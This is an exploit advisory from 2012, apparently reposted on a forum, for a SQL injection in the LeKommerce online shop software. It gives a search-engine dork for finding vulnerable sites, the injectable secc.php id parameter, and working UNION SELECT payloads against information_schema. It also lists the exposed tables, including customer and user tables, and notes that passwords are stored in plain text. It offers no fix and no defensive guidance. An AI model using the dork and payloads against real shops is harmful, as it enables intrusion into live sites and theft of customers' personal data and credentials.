SQLI Online Shop LeKommerce

[Nytro]

[h=1]SQLI Online Shop LeKommerce[/h]

# Author: Mazt0r
# Exploit Title: Online Shop SQLI LeKommerce
# Date: 04 MARCH 2012
# software: LeKommerce
# link: http://www.lekommerce.com/
# Version: "All version's"
# Category: Commerce online
# Tested on: Linux
D0rk: inurl:secc.php?id=
=====================================
Exploit :
======================
http://localhost/path/secc.php?id={sqli}
======================
Example:
======================
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
http://localhost/path/secc.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7+from+information_schema.tables--
======================
dbs:
======================
+--------------------------------+
| t_clientes |
| t_colores |
| t_colores_idiomas |
| t_configuracionglobal |
| t_emailing |
| t_emailingcliente |
| t_facturascompra |
| t_facturasventa |
| t_familias |
| t_familias_idiomas |
| t_formaspago |
| t_idiomas |
| t_incidencias |
| t_iva |
| t_marcas |
| t_menusuperior |
| t_noticias |
| t_productos |
| t_productos_idiomas |
| t_proveedores |
| t_provincias |
| t_rel_productos_tallas_colores |
| t_rel_tallas_colores |
| t_seccionesproductos |
| t_seccionesproductos_idiomas |
| t_series |
| t_subfamilias |
| t_subfamilias_idiomas |
| t_tallas |
| t_tallas_idiomas |
| t_tiposperfiles |
| t_traducciones |
| t_usuarios |
+--------------------------------+
PASSWD: TEXT PLAIN? <<<--- SECURE? EPIC!
--------------Gr33tZ------------------
DDLR - CYBERLOCOS - Thelatin - K4rl -Cpum4 - N350k - hkm - nitr0us - Xianur0 - All Firends!
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
---------------------------------- 

Sursa: SQLI Online Shop LeKommerce